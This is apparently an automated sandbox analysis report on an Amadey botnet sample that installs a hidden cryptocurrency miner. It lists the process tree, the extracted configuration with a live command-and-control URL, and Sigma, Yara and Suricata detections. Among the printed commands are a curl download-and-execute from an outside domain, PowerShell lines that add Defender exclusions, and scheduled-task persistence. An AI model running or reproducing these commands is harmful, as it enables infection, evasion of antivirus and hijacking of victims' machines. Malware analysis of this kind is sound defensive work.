      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7620 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7820 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3052 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8176 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2944 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 344 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2756 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3244 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 416 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7404 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • services64.exe (PID: 6264 cmdline: C:\Windows\system32\services64.exe MD5: 651396CF297F15A1F92EE0A29E27C4EA)
    • cmd.exe (PID: 928 cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5720 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6640 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4304 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7368 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1628 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost64.exe (PID: 7732 cmdline: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: A8638A5105C9A663B0D6918D64B3AD21)
        • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 4420 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • sihost64.exe (PID: 7844 cmdline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe" MD5: 7112FD4E6B2CDD13C11B8B04A96769CB)
        • cmd.exe (PID: 8180 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 2720 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\svchost64.exeJoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Click to see the 13 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              85.2.miner2.0.exe.347b538.1.unpackJoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security
                122.2.services64.exe.3434b28.1.unpackJoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security
                  122.2.services64.exe.3434b28.1.raw.unpackJoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security
                    122.2.services64.exe.3421e28.2.unpackJoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security
                      122.2.services64.exe.342b490.0.raw.unpackJoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security
                        Click to see the 12 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Curl Download And Execute Combination
                        Source: Process startedAuthor: Sreeman, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe, ParentProcessId: 1748, ParentProcessName: loader_5879465914.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, ProcessId: 4408, ProcessName: cmd.exe
                        Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe", ParentImage: C:\Users\user\AppData\Local\Temp\svchost64.exe, ParentProcessId: 5992, ParentProcessName: svchost64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, ProcessId: 7224, ProcessName: cmd.exe
                        Sigma detected: Invoke-Obfuscation VAR+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe", ParentImage: C:\Users\user\AppData\Local\Temp\svchost64.exe, ParentProcessId: 5992, ParentProcessName: svchost64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit, ProcessId: 7224, ProcessName: cmd.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: miner2.0.exe, ParentImage: C:\Users\user\AppData\Local\Temp\miner2.0.exe, ParentProcessId: 5868, ParentProcessName: miner2.0.exe, ProcessCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ProcessId: 8080, ProcessName: cmd.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 8116, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: miner2.0.exe, ParentImage: C:\Users\user\AppData\Local\Temp\miner2.0.exe, ParentProcessId: 5868, ParentProcessName: miner2.0.exe, ProcessCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ProcessId: 8080, ProcessName: cmd.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: cscript conf.vbs, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 7692, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f, ProcessId: 7580, ProcessName: schtasks.exe
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe, ParentProcessId: 1748, ParentProcessName: loader_5879465914.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, ProcessId: 4408, ProcessName: cmd.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: cscript conf.vbs, CommandLine: cscript conf.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4408, ParentProcessName: cmd.exe, ProcessCommandLine: cscript conf.vbs, ProcessId: 7692, ProcessName: cscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 4496, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T17:42:05.763405+020020446961A Network Trojan was detected192.168.2.449738185.215.113.1680TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T17:42:03.185010+020028561471A Network Trojan was detected192.168.2.449737185.215.113.1680TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T17:42:03.422402+020028561221A Network Trojan was detected185.215.113.1680192.168.2.449737TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T17:42:03.636291+020028033053Unknown Traffic192.168.2.449737185.215.113.1680TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: file.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: http://185.215.113.16/Jo89Ku7d/index.phpURL Reputation: Label: phishing
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Found malware configuration
                        Source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeReversingLabs: Detection: 50%
                        Multi AV Scanner detection for submitted file
                        Source: file.exeReversingLabs: Detection: 50%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: file.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402559 CryptBinaryToStringA,malloc,CryptBinaryToStringA,7_2_00402559
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402607 CryptStringToBinaryA,malloc,CryptStringToBinaryA,free,7_2_00402607

                        Bitcoin Miner

                        barindex
                        Yara detected BitCoin Miner
                        Source: Yara matchFile source: 85.2.miner2.0.exe.347b538.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3434b28.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3434b28.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3421e28.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.342b490.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3484bd0.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.342b490.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.347b538.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3471ed0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 122.2.services64.exe.3421e28.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3484bd0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 107.0.svchost64.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 85.2.miner2.0.exe.3471ed0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000006B.00000000.2677511483.0000000000012000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000055.00000002.2682783373.000000000345A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: miner2.0.exe PID: 5868, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: services64.exe PID: 6976, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost64.exe, type: DROPPED
                        Yara detected SilentXMRMiner
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR
                        Found strings related to Crypto-Mining
                        Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: I/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zipp
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49748 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49750 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49751 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49755 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49757 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49758 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49760 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49761 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49764 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49763 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49768 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49770 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49771 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49773 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49774 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49776 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49777 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49779 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49780 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49783 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49786 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49785 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49788 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49789 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49793 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49792 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49795 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49796 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49800 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49801 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49803 version: TLS 1.2
